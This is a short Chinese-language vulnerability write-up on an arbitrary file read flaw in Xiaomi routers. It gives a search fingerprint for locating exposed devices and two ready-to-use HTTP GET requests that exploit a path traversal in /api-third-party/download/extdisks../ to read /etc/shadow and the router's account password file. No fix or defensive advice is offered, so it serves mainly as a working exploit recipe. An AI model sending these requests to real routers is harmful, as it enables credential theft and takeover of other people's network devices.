# 小米路由器任意文件读取漏洞

# 一、漏洞简介
小米路由器是一款高配的智能路由器,具备强大的扩展,并且具备高速传输的特点,其传输速度最高可以达到866M,相比普通150M/300M的普通无线路由器具备更高无线传输速率。小米路由器系统任意文件读取漏洞

# 二、影响版本
+ 小米路由器

# 三、资产测绘
```plain
app="小米路由器"
```

![1717231971362-917b53db-2985-4d7c-8a42-118940873a2c.png](./img/Qww4sdoQYgfh-0gQ/1717231971362-917b53db-2985-4d7c-8a42-118940873a2c-622952.png)

# 四、漏洞复现
```plain
GET /api-third-party/download/extdisks../etc/shadow HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
```

![1717231994318-8206991d-9a44-4abd-9620-1259bfb61336.png](./img/Qww4sdoQYgfh-0gQ/1717231994318-8206991d-9a44-4abd-9620-1259bfb61336-319945.png)

读取登录密码

```plain
GET /api-third-party/download/extdisks../etc/config/account HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
```

![1717233232303-77763c87-be53-47c2-9d2d-07df3e961f46.png](./img/Qww4sdoQYgfh-0gQ/1717233232303-77763c87-be53-47c2-9d2d-07df3e961f46-241369.png)



> 更新: 2024-06-11 10:30:33  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/slv3fogu0wvlvht3>